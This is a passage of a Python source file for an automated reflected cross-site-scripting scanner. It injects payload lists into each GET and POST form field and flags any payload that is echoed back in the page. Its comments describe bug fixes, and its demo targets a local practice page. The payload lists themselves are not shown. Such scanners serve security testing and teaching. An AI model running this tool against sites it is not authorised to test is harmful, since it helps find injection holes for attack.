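            connection.connect()
        finally:
            connection.close()

        path = target.scheme + "://" + target.netloc + target.path

        if level == 1:
            payloads = payload_1
        elif level == 2:
            payloads = payload_2
        elif level == 3:
            payloads = payload_3
        elif level == 4:
            payloads = payload_4
        else:
            payloads = []

        # The field string is parsed directly; the original glued it onto a
        # hard-coded placeholder URL just to reuse urlparse.
        parameters = urlparse.parse_qs(data, keep_blank_values=True)
        fields = []
        for para in parameters:
            for value in parameters[para]:
                fields.append((para, value))

        for pn, _ in fields:
            for i in payloads:
                # Skip list entries that are empty or whitespace only.
                if not i.strip():
                    continue
                form = {}
                for other_name, other_value in fields:
                    # Compare names for equality.  The original used a
                    # substring test (``pn in d``), which dropped every field
                    # whose name merely contains ``pn`` ("id" vs "uid").
                    if other_name != pn:
                        form[str(other_name)] = str(other_value)
                form[pn] = str(i)
                body = urllib.urlencode(form)
                r = br.open(path, body)
                sourcecode = r.read()
                if i in sourcecode:
                    results['value'] = pn
                    results['payload'] = i
                    return results
    except Exception:
        # Best effort and silent, as before (the inner bare ``except`` made
        # the outer ``print e`` handler unreachable).  Ctrl-C and SystemExit
        # now propagate, so a long scan can be interrupted.
        return None
    return None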
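def get_xss(url, level=1):
    """Run the GET check on ``url`` and fall back to the POST check.

    ``GET`` is tried first.  Only when it reports nothing is the URL split
    at its first ``?`` into endpoint and field string and handed to
    ``POST``.  The original always ran both checks, sending the POST
    requests even when the GET result was the one returned.

    A URL without a query string no longer raises ``IndexError``; ``POST``
    is then called with an empty field string.

    Returns the first non-``None`` result of the two checks, else ``None``.
    """
    res1 = GET(url, level=level)
    if res1 is not None:
        return res1
    # partition() keeps everything after the first '?', including any
    # further '?' characters inside parameter values.
    domain, _, data = url.partition('?')
    return POST(domains=domain, data=data, level=level)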
if __name__ == '__main__':
    # Manual smoke run of all three entry points against a page served on
    # the local machine; each result is printed as returned.
    demo_url = 'http://127.0.0.1/xss/level2.php?keyword=%E2%80%98&submit=%E6%90%9C%E7%B4%A2'
    print(GET(url=demo_url, level=3))
    print(POST(domains='http://127.0.0.1/xss/level2.php', data='keyword=‘&submit=搜索', level=3))
    print(get_xss(url=demo_url))